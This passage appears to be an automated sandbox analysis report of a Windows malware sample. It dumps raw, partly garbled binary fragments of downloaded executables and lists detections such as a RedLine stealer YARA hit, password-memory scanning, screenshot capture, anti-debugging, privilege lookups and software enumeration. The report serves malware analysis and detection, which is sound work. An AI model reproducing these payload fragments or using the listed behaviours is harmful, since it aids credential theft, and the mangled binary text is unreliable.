(ÿK7e&-ù{8Z+ (×/&-ù}0+ (¹b3&-ù(Þ 8b+ (/Ì62&-ùo\j+ (xÈ,1&-ù{8Z+ (ì§?c&-ù}0+ (ßCD&-ùo_ 8b+ (-HR&-ù(ßj+ (!Y&-ù{8Z+ (mT]&-ù}0+ (,C&-ù(à 8b+ (ÍNh&-ù(áj+ (zÓ7V&-ù{8Z+ (F)U&-ù}0+ (n=5:&-ù(â 8b+ (/§1n&-ùohj+ (VMH9&-ù{8Z+ (â>I&-ù}0+ (ª»Xl&-ù(ã 8b+ (V¬_i&-ù(ä*j+ (^\&-ù{8 request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 5, 2024, 7:50 a.m.	buffer: MZÿÿ@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdð"¢À@Ð` 0¼7\|,À±p.textq ¢ `.rdata8ìwÀîw¨@@.datapt°@À.pdata¼708@@.xdatapÎ@@.idataÐ@À.reloc\|,.Ö@B.symtabÀBÿ Go build ID: "PeRO1v1OpqzLTbg1Fzum/8MvBI5abtuCavuXIKNPS/QKcUmoc0HqteOX89Ust7/ykc7YaNryMNVHoVUvksJ" ÿÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌI;fv,UHåHìHD$ H\$(èHD$ H\$(è4HÄ]ÃHD$H\$@è{¿HD$H\$ë¯ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌLd$øM;fÿUHåHÄH$ëLÃHðHÛ91ÉéìHÇÁÿÿÿÿHÉ} HÙE1À1öë1H9ÙHq@H9óH)ËH{ÿIøH÷ßHÁÿ?H!þHÆHù\|8cpu.u1Òé«HÇÂÿÿÿÿLD$PHt$pHÒeH9Ê0HúHzüIùH÷ßHÁÿ?çLRH8L9ÑçLL$HH\$`H)ÑLYÿL\$ MÜI÷ÛIÁû?M!ÚNL\$XHùuF·fAúonuzHùë'HùunF·,@fAýofu]F¶TAúfuQHùAÂ@Húu&D·8fAûalu¶\|8@ÿluH=c¢1ÀéDT$HP¢HT$@1Àé»èDH¿j »èLHD$XH\$ èvLH:¯ » èeLHD$`H\$HèVLHýF »èELDèDHt$pLD$PéþÿÿHL$(HD$hfèCHÜ² »!è LHD$hH\$(èûKH¢F »èêKèÅCHt$pLD$Pé¸ýÿÿHo¡H p¡HL$P1ÒëHÀ HÿÂH9Êxtê¶XHpÛto>ujHT$HHD$xHHL$pHPHT$@è÷BHV »èfKHD$pH\$@èWKH »èFKè!CHD$xHL$PHT$HéoÿÿÿéhÿÿÿHì]ÃHÿÁH9Ùýÿÿ¶4@þ,uêéýÿÿHÿÂH9ÊLýÿÿ¶<@ÿ=uééDýÿÿHG@H9Ð¾H x H9ÈHÇHÁàLY ILML9ÉuÃH\|$8HD$0LØèÀu&HT$@H\$`Ht$pH\|$8LD$PLL$HD¶T$ëH HD$8H9ÈH5ðH\|$0ÆD>H çH9ÈsnL ÓD¶T$ET9Ht$pLD$PéûûÿÿèAHô¥ »èJHD$`H\$HèôIHD »èãIè»AHt$pLD$Pé®ûÿÿèGÝèBÝfè;ÝLTGTHÿÀH9øûÿÿH DH9Ès%IÁIÁáL)CÆDH $H9Èr¼èòÜèíÜLÐè¥Ý¸HÑèÝHÈHÑHÂè ÝHðHÙ@è{ÝHÚèóÜHD$H\$èCºHD$H\$éÔúÿÿÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌI;fUHåHìPH?è¢¦HÇ@H ÖC HH ªÔHHHÇ@(H ¼C HH H ÔHH0HÇ@HH GD HH@H sÔHHPHÇ@h H uK HH`H XÔHHpHÇH ØE HH 6ÔHHÇ¨H ;C H H ÔH°HÇºHÇ·=`ÏtèØIH IKH@è»EWÿL5ÏeM6M6$fDø H `HQHÃH>H9ÙsID$HHÐ¿H5FÝè¡PH *=ÓÎtè×IHISH÷HÂD$HHñLCûIÁàJÇDBÆDBÆD=ÎtNè:×MNLMKL D NL æÒNLJÇD(BÆD8BÆD9=;ÎtNL èïÖMNL0MKL oB NL L ÒNL0JÇDHBÆDXBÆDY=ïÍtNL@è£ÖMNLPMKL íB NL@L SÒNLPJÇDhBÆDxBÆDy=£ÍtNL`èWÖMNLpMKL ¦B NL`L ÒNLpJÇBÆBÆ=NÍt N@èûÕMNMKL LB NL ¤ÑNøíH NH?HÃH,H9Ùs;¿H5;ÛèNH =ÈÌtèÕIH ÷IKHìHíHKûHÁáHÇDÆDÆD=ÌtH request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 5, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³cjàcjàcjà8ÿiáijà8ÿoáëjà8ÿnáqjà¶únáljà¶úiárjà¶úoáBjà8ÿkádjàckàjàøùcá`jàøùjábjàøùàbjàøùhábjàRichcjàPELhÖeà!!g à@ z<{P°øÀ°o8èo@ H.textV `.rdata b d@@.datav@À.rsrcø°@@.relocÀ@Bj hèl¹pèßHhèSYÃÌÌÌj hm¹è¿Hh`èSYÃÌÌÌjh0m¹ èHhÀèmSYÃÌÌÌjhHm¹¸èHh èMSYÃÌÌÌjham¹Ðè_Hhè-SYÃÌÌÌjham¹èè?Hhàè SYÃÌÌÌjham¹èHh@èíRYÃÌÌÌjham¹èÿGh èÍRYÃÌÌÌhè¾RYÃÌÌÌÌh`è®RYÃÌÌÌÌhÀèRYÃÌÌÌÌj?hèm¹xè¯Gh è}RYÃÌÌÌhènRYÃÌÌÌÌh è^RYÃÌÌÌÌh@èNRYÃÌÌÌÌhàè>RYÃÌÌÌÌhè.RYÃÌÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèb[ÄÆ^]ÂÌÌÌI¸¼lÉEÁÃÌÌUìVñFÇÔ!Pè[ÄöEtjVèLNÄÆ^]ÂAÇÔ!Pèi[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhzEôPè;[ÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèZÄÇ,"Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèRZÄÇà!Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìì}SVÙW]àÛ}0Ñ}HÇj/hdmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèEjjjjhmÿ,!}MjCMjjjjjPQPE´ÿ0!}4M jCM jjjjQhmPE¸ÿ4!}LU8ÿuHCU8MÈ}ÜðRÿuØCMÈQVuÀÿ8!EüPhÿûÿÿPVÿ<!Ài}ü\ûÿÿÇEÇEPÆEfD@Éuù+ÂMPûÿÿPè§DMüE9MÇE¬BM}QCEMPÇE°ÆEèvD}°U}MôC×Eø]¬+ÁMÄSR;Øw,}øuäCuäEôPè«jMÄ3uÀÄÆëÆE¼Mäÿu¼SèG}E°ør+HÇùrüÁ#+ÇÀüøQWèXKÄUúr,MBÁúrIüÂ#+ÁÀüødRQè$KÄEüÆûÿÿEüPhÿûÿÿPVÿ<!Àþÿÿ]àV5@!ÿÖÿu¸ÿÖÿu´ÿÖEäUÜ¸ÆEäó~EôfÖCÇEôEøúr/MÈBÁúrIüÂ#+ÁÀüøÌRQèJEøÄÇEØÇEÜÆEÈør.MäPÁúrIüÂ#+ÁÀüøRQèDJÄUÇEôÇEøÆEäúr,MBÁúrIüÂ#+ÁÀüø>RQèþIÄU4ÇEÇEÆEúr,M BÁúrIüÂ#+ÁÀüøøRQè¸IÄULÇE0ÇE4ÆE úÇM8BÁú«IüÂ#+ÁÀüøªéjhamÇCÇCÆèÝAUúr(MBÁúrIüÂ#+ÁÀüøwbRQè"IÄU4ÇEÇEÆEúLÿÿÿM BÁú0ÿÿÿIüÂ#+ÁÀüøwéÿÿÿRQèÓHÄ_^Ã[å]ÃèðnÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì<¹`SVW=@3öVham3ÛèAÿDCOãÿyKËÿÿÿCð¥¶ÑòæÿyNÎÿÿÿF¶ð¥ð¥ð¥Mà¶ð¥Âuø¶ÀjÇEðÇEô¶ð¥EÿEÿPÆEàè@Eàº`PMÈèÆAðÄþ`t\| tùr.¡`AùrPüÁ#+ÂÀüøÔÂQPèµGÄÇpÇtÆ``ó~FfÖpÇFÇFÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøw_RQèBGÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøwRQèGÄÿtuøéoþÿÿ_^[å]ÃèmÌÌÌUìì<SVWùÇGÇGÆèþÿÿ¡t¾``ø»0Cò=DC0+Þ]øø¹`¡pCÊÁ;ð*3Mà2EÿEÿjPÇEðÇEôÆEàèÞ>Eà×PMÈè@ØÄ;ûteOùr+AùrPüÁ#+ÂÀüøÍÂQPè FÄÇGÇGÆó~CfÖGÇCÇCÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøwiRQè§EÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøw'RQèeEÄ¡tF`]øé¼þÿÿÇ_^[å]ÃènkÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQ}4E SCE VWÿu0Mü¹HPè=}EÿuCE¹0Pè=5X3Û=\fDÿð¥Ã¹HC H÷þ ð¤Cû\|Ô3ÿ3öð¥¶ð¤ø¶ÊùçÿyOÏÿÿÿGð¥ð¥Fð¥þ\|ÁuüÎèýÿÿUúr request_handle: 0x00cc0018	1	1
InternetReadFile Jan. 5, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`ÏnÉàPÆEFäE F@ HÛÊH@ÀãEKFØBø&HpN`HSãE H.textÄE ÆE `.rsrcØBFDÈE@@.reloc`HH@BðãEHÔâä\|#w`"0>(8( 9& 8 8ÕÿÿÿþE8(¦%&~þ~0@(¦%8( :& 8 8ÔÿÿÿþE8&~þ~0¾ þ8þE\)pA8Ws 8Åÿÿÿ( 8¶ÿÿÿs þ8ÿÿÿs :ÿÿÿ&8ÿÿÿs 8oÿÿÿs 9Zÿÿÿ&8Pÿÿÿ0l þ8þE,/8'~o (9Îÿÿÿ& 8Ãÿÿÿ8øÿÿÿ (:¬ÿÿÿ&8¢ÿÿÿ0g þ8þE'A8"~o (:Îÿÿÿ&8Äÿÿÿ8 (9´ÿÿÿ&8ªÿÿÿ0g þ8þEA8<87 (:Öÿÿÿ&8Ìÿÿÿ~o (9´ÿÿÿ&8ªÿÿÿ0g þ8þEA'8<~o (9Îÿÿÿ&8Äÿÿÿ8 (:´ÿÿÿ&8ªÿÿÿ0l þ8þE$'88 (9Öÿÿÿ& 8Ëÿÿÿ~o (9¬ÿÿÿ&8¢ÿÿÿ(¦%&~þ~0 þ8þE½/m2N¡8¸r¹p (7(8o7 s8 8¬ÿÿÿ~(6 þ8ÿÿÿ8Üÿÿÿ (::yÿÿÿ& 8nÿÿÿ~ 8[ÿÿÿ:~ÿÿÿ (:9Eÿÿÿ& 8:ÿÿÿ (:9$ÿÿÿ&8ÿÿÿ8¬ÿÿÿ 8ÿÿÿ0l þ8þE$F88< (99Öÿÿÿ& 8Ëÿÿÿ~ (::´ÿÿÿ& 8©ÿÿÿ0A þ8þE!8 (:9Øÿÿÿ&8Îÿÿÿ0 þ8þES"8N8øÿÿÿ (9:Ïÿÿÿ&8Åÿÿÿ(;r#p~(<(= (9:ÿÿÿ&8ÿÿÿt 8ÿÿÿ0 þ8þE;\Y86(;r5p~(<(3 (::»ÿÿÿ& 8°ÿÿÿt (:9ÿÿÿ&8ÿÿÿ8øÿÿÿ 8ÿÿÿ.(>(c&>þ þ (9 .þ (V&.þ (" &~þ~(0Jþ þ þ o: .þ (3 (¦%0i þ8þE+8s@(Ct 9Êÿÿÿ&8Àÿÿÿ(B :´ÿÿÿ& 8©ÿÿÿ09(B8(; :&88ÚÿÿÿþE80b þ8þE"88 (E9Öÿÿÿ&8Ìÿÿÿ~ (E9¶ÿÿÿ&8¬ÿÿÿ(¦%.þ (< &~þ~0g þ8þE'88øÿÿÿ (I9Óÿÿÿ& 8Èÿÿÿ(G (H:±ÿÿÿ&8§ÿÿÿ(A&~þ~0K þ8þE&89 þ8þEFU!8{: (P9Ìÿÿÿ&8Âÿÿÿ{(M (P:¬ÿÿÿ& 8¡ÿÿÿ87 8ÿÿÿ{þ88 (P9mÿÿÿ&8cÿÿÿÝf(N (P9& 8þE8Ü (P9êþÿÿ& 8ßþÿÿ (O:Ïþÿÿ&8Åþÿÿ)ºã60« þ8þERPPv©ÿ/"Ï8M([ (P9³ÿÿÿ&8©ÿÿÿrGp"As= (V (P9ÿÿÿ&8{ÿÿÿrqp(Z (O9dÿÿÿ& 8Yÿÿÿs> (Y (O:=ÿÿÿ&83ÿÿÿ(Q 8&ÿÿÿ(S(T (P9ÿÿÿ& 8ÿÿÿ K ìs? (U (O:Ûþÿÿ& 8Ðþÿÿ"`A"èAs@ (A (P:«þÿÿ& 8 þÿÿ(W(X (O:þÿÿ&8{þÿÿ(R þ8cþÿÿ0f¸(¦%8(B °þU88ÜÿÿÿþUEþ%JÿUPb\|:÷{D¶*&±U×\âÕ´Ú&>×³Ê¶DùÕíÜY"Í$Â+yÕ³±ß=»uV-xC!Ó·øPpÝ¤#'s7£q×¸Ì2Å'T ¿dÔûlø5vÜüª3r request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 5, 2024, 7:51 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELmeàÂg^àg h@ @h@àgKhØ h H.textdÀg Âg `.rsrcØhÄg@@.reloc hÊg@B@àgHxÊgØ'¢g0_~, (,( ~, (,( ~, (,( ~, (,( ~,~ èZ( ~,rprp( & 8Â~o ~ o ~o ~o (~ , (~ rp( ,( rpo (+)~ r1p( ,( rpo (( ( ( (X ~o ?.ÿÿÿ~&0/s s s o Þ ,o Üo 0(i +i]aÒXi2ç6((+Ò0c ( ~-þs ~(+(+ + i]XX ÿ_(X 2Ø(! 0w{X ÿ_}{{{X ÿ_}{{{({{{{{X ÿ_aÒ03s (}}}þs" (+0 0rKp(# s$ o% t0ª(& o' rcp( ( (( -() o (+ ,(, ,(- `(. ~/ (0 ~o1 o2 o3 Þ/&Þ~4 (0 ~o1 o2 o3 Þ& Þ* R'y%\|%¡%0 r1p rmp(5 s6 rçpo7 rpo7 rEpo7 s6 rcpo7 rcpo7 rcpo7 s6 rSpo7 rSpo7 rSpo7 s6 (8 o7 (8 o7 (8 o7 (! "(9 (! 0D s: o; o< rSp( ,o= &rip( ,(( -o= &(! 0Ír{ps> o? o@ +zoA rÁpoB oC oD rÛp( ,!rpoB oC oE rpoF -) r#poF -rpoB oC r1p( ,Þ4oG :zÿÿÿÞ,o ÜÞ ,o ÜÞ ,o Ü(¤ ² ³¾ 0rGp( (I ,0 (J oK (&06(L (M ( (L (M Y j/ÞÞ&Þ//(! ¢gÎÊï¾lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSetPADPADPtHc¿èÊ1hEdA@31839b57a4f11171d6abc8bbc4451ee4InstallSetup7ÛAtesaeaSg ÛAxZãg2vxÿhÒ5453d2rxshj545sd2rxsh5:s´mÍ¸sLµ!'hsJpGoSrTmScn\o eSrnJi[ pOf oe \shj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rx#Eh&19dsd2rpcc5<t5è0d21xshjPu4usd2r}shj045sdÀ£rxh54%sd2bxshj%45sd2¦s8#hj·ÄJ4sd2rxÐ2øj545s¤Qrnxshj545sd2rxsðmu45sd2rP8óhj545sd2rxshjtQxAsù:rrxs<(j545sd2rXs`FraAa4,sdPrr.xs@(j545sdrr@Vdt jMv53d2rn8shj5453dÀrrs*e5¶5Lrdrrxshj5t5@sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rxshj545sd2rx`fã öÌøÌùÌ¿Ì¨Ì¸ú »Ì¿Ì¤Ì¦ÌùÌøÌ`Ù!XñìpÝo$c5Ùi¶ÄÙ!oÂvù4 a©ÌùÌøÌùÌ¿ÌåÓ4Æ»Ì¿Ì¤Ì¦ÌùÌöÌ¿Ì¨ÌþÌ¾Ì´Ì¿Ì=Ùx<5622/3UèèÂ515äíEÊu\|WûPè=ÿ d5~hô2glèsSåEHè½Má&ÌÍÿ¡óã µµEÝ?qdwÐûM¤»S request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 5, 2024, 7:51 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELg à0xà^ @ @K øÜ H.textdv x `.rsrcøÜ Þz@@.relocX@B@Hqd´¬d%'(0Þs ~%:&~þs %(+o 8qo %F(¢%G(¢%H(¢%e(¢(÷o 8( s sÌ~ }~ s ~`(~a(}{I(~b( 9I(86 (~b( :{(ú8{(ù~c($:1~d((~e(,~f(0~g(4~h(8{(ø~c($:Ós s s þs ~%:&~þs %(+ þs ~%:&~þs %(+ þs ~%:&~þs %(+o¼o¾þs ~%:&~þs %(+oÀ oÆþs ~%:&~þs %(+oÂþs ~ %:&~þs % (+oÄþs ~ %:&~þs % (+oÈ{(oÊ (+9ssÌ%o¼%rpf(~i(<o¾%s" oÀ% oÆ%s# oÂ%s$ oÄ%oÈ%oÉoÊ o% (+9ssÌ%o¼%rpg(~i(<o¾%s" oÀ%oÆ%s# oÂ%s$ oÄ%oÈ%oÉoÊo% Ý&ÝoË:o% (& :èûÿÿÝþo' Ü~j(@:ûÿÿÝ9~k(DÜÝ&ÝAd¨Éqz"4¿ÐÖ0£s" F(~l(H~m(L: Ýq(sh(o&8%sñoo~n(Poìo~n(Poî( oðÝ&ÝÝoë~o(T:oë8;(oìoí~o(T:oí8;(oîoï~o(T:oï8;(oðÜoï;(~p(X9o( Xo?ÍþÿÿÝ&ÝÝ&Ý Ad]W´]b¿7W0;( i(~l(H~q(\:ÝiQ(~r(`(+(%j(¢~s(d%"~t(h~u(l Ý&Ý0ñs ~l(H~m(L: ÝÅ(sH(~v(po&8osÒ%o~n(PoÕ%o~n(P~d((.þo×%o~n(PoÙ%o~d((1þoÛ%o~n(P~w(t @Bj[!¶YoÝ%o~n(Poß%o( oáoÜj<9~x(x~y(\|~z(!µ÷õYoÝÝ&Ý:8(à~o(T:o Xo?þÿÿÝ&ÝÝ&Ý* AL]51«Üáç0s# G(~l(H~m(L: Ýß(sk(o&8o~n(P%v%1s+ ~{(9( sº%o~n(Po·%o¹Ý&Ý9o, Xo?_ÿÿÿÝ&ÝÝ&Ý ALYuÎ7Åü0+sÑ G(~l(H~m(L: Ýù(sl(o&8o~n(Po~n(P( rp~b( 98sÑ%-~t(hoÎoÐ 8sÑ%oÎ%oÐ Ý&ÝXo?EÿÿÿÝ&ÝÝ&Ý *ALW ÷7ß!05s$ G(~l(H~m(L: Ý(s request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 5, 2024, 7:51 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $PELMcà ¾C @°EÅ¯ÄC<`DI°!=@ x.text= `.rdataf, . @@.dataxBP8@À.rsrcI`DJN@@ff ÃÌÌÌÌÌÌÌÌÌ ÃÌÌÌÌÌÌÌÌÌÌÌUìÙEjìÝ$èÛÙ]ÄÙE]ÂGÈaÃÌÌÌÌÌÌÌÌÌá4ïÆÃÌÌÌÌÌÌÌÌÌ)ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUììxEV0@W3ÿ=èRuäEøuWÿ BWÿ B h`Bl`BSEè}èMÔUÌèÿÿÿ¡p`B t`BEè?EÐMÜ» ëuäÇEôEô èRÆÁàEüùuhW÷ÿÿRWÿ\| BWEÈPWWWÿL Bj0MWQ}èÑÄUÀREPWÿ, B3É3ÒE¼PfMàfUâMàQWhp4BWÿ BEü èREÐEüù©uÇH@.ëíë ùëuWÿ BWUÄRÿp B=4BEèMôÆÓîEìÇHî=êôuÜEì1Eü3uüuØEØEød)EømødMøÁáMüEÔEü}ðEèEðEøEðEðEìUøMôÂÓèMüEÌ3Eì3ÈEäMüèBþÿÿEèèþÿÿë³þÿÿ=èRm Eäu[uWWWÿ0 BMø_N^å]Â_V^å]ÂÌÌÌÌÌÌÌÌÌÌUìQ¡èRÁèV58BÀvZS BW=@ BEüë=èRY u$jjÿ×jjjjjÿÓjÿ Bjjÿh BVèýÿÿÆmüuÁ_[^å]ÃÌÌÌÌÌÌÌÌÌÌUìQÇEüEüy5Eü8Bå]ÃÌUììh°4Bÿ< B±t²rh¸pBP£<BÆ¸pBVÆ¹pBiºpBÆ¿pBP ÅpBÆÆpB »pBÆÄpBcÆ¼pBuÆ½pBaÆ¾pBlÀpBÆÁpBo ÂpBÆÃpBeÿ¬ B£0BÇEü Eü MüèREøP¡8BQRPÿ0Bå]ÃÌÌÌÌÌÌÌQh¸pBÿ¤ BÃÌÌÌUìd¡jÿhBP¸8d%è.¤=èR±SVWjjjEðPjjjÿd Bjjÿ BMìQjjjÿ BUèRÿ BEÈèijjÇEüèjjèjjè£ÄèOÿÿÿjèµjè¾ÄÇ$èûÿÿÝØuÈÇEüÿÿÿÿè1¡bB£ìR¡èRKPj£èRÿt B£8Bè5þÿÿ= B¾L¡M¼Qjjjÿ×îuï95èRvz=P B BëIìR2K 8B1=èR¨u>hÌ4Bjÿ×jjUðRÿÓjÿ BEèP¼ïÿÿQÿ BjjjjjjÿH BF;5èRr=\ B$ B3öèRÖúujjhð4Bÿ×jÿÓjÿ4 Bjÿ BFþ!\|Ëè¯üÿÿ=T B3ö¤$ÿ×þbuèýÿÿFþÛt\|ë5 B=x B BÇEð{ÿ=èRu7j¼÷ÿÿPh5BÿÖjh5BhP5Bÿ×jjjÿÓMäQ¼ûÿÿRÿ° Bmðu·h¬5Bÿl BMô_^d [å]ÃÌÌÌÌÌÌÌÌÌÌÌUìì,=èRVWuD3É3ÀUüRfEüfMþEüPQh¸5BQÿ BjjÔ÷ÿÿQjÿD BEÜèÍuÜèå=T BS]ü3öÿ×þ£ò*~ûEÛ«xu Fþ]\|å=X B( B3öjÿ×ÿÓÿ BþGm Fþ¤ö\|ã]ü=8 B3öjÿ×þ%+~ûÕtPxu Fþ\|ã¬bBèRèüÿÿ5¨ B¿[=èRuEÔPÿÖïué¡8B£\|HÿÐ_3À^å]ÂÌVQðÄèÆè~jèGÆ^ÃÌÌÌjè9ÃÌÌÌÌÌÌÌÌVQðÄèµÆèjègÆ^ÃÌÌÌjèYÃÌÌÌÌÌÌÌÌUì}t~rFè¹ÆÇFè{]ÂÌÌÌÌÌÌÌÂÌÌÌÌÌÌÌÌÌÌÌÌÌÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUì}t~rFèÆÇFèk]ÂÌÌÌÌÌÌÌÂÌÌÌÌÌÌÌÌÌÌÌÌÌÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQ3ÉMÿHèÐEÿèe÷ÿÿå]ÃÌxr@ÃÀÃÌÌPè4YÃÌÌÌÌÌÌÌÌUìQ3ÉMüHèÐEüè÷ÿÿå]ÃÌPèYÃÌÌÌÌÌÌÌÌxr@ÃÀÃÿUìQVW¾ÿÿVh?è YYMø¸ð#Èf;ÈuzÝEQQÝ$èóYYÀ~8ø~%øu.ÛEWìÝ\$ÝEÝ$jèîÄéFVWè9 YYé5ÝEWÜØ!BìÝ\$ÛEÝ\$ÝEÝ$jjèÄ$é ÙîÜ]ßàöÄD{·ÝEEüPQQÝ$èÉEMüÄÀ} º+Ð;Ê\|yëºÿÿÿ+Ð;Ê Á= ~1WìÝ\$ÝPBÝ$è>Ý\$ÛEÝ$QQÝEÝ$jjéwÿÿÿ=~$úÿÿPQQÝ$èÇÄWìÝ\$ÛEÝ\$ëÆ=öÿÿ}$Ü Ð!BWìÝ\$ÛEÝ\$ÝEÝ$jjé!ÿÿÿ=üÿÿ}PQQÝ$èqÄëÆPQQÝ$èaVÝ]WèÄÝE_^ÉÃÿUìj jÿuèÄ]ÃÿUìÿuj jÿuè$Ä]ÃÿUì]éÜÿÿÿÿUì]é&ÿUìì(¡øQB3ÅEüöPBVtj èaYèÀtjè YöPBÊàýÿÿÜýÿÿØýÿÿÔýÿÿµÐýÿÿ½ÌýÿÿføýÿÿfìýÿÿfÈýÿÿfÄýÿÿf¥Àýÿÿf¼ýÿÿðýÿÿuEôýÿÿÇ0ýÿÿµèýÿÿ@üjPäýÿÿØüÿÿjPè,ØüÿÿÄ(ýÿÿ0ýÿÿjÇØüÿÿ@µäüÿÿ,ýÿ request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00232a00', u'virtual_address': u'0x0000c000', u'entropy': 7.988306676637549, u'name': u'.rsrc', u'virtual_size': u'0x00233000'}

entropy

7.98830667664

description

A section with a high entropy has been found

entropy

0.98576434516

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (7 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Jan. 5, 2024, 7:49 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 5, 2024, 7:49 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 5, 2024, 7:50 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 5, 2024, 7:50 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 5, 2024, 7:50 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 5, 2024, 7:50 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 5, 2024, 7:51 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (28 events)

description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	RedLine stealer	rule	RedLine_Stealer_m_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 204 events)

Time & API	Arguments	Status
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000008f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: 7-Zip base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: AddressBook base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: Adobe AIR base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: Connection Manager base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: DirectDrawEx base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: EditPlus base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
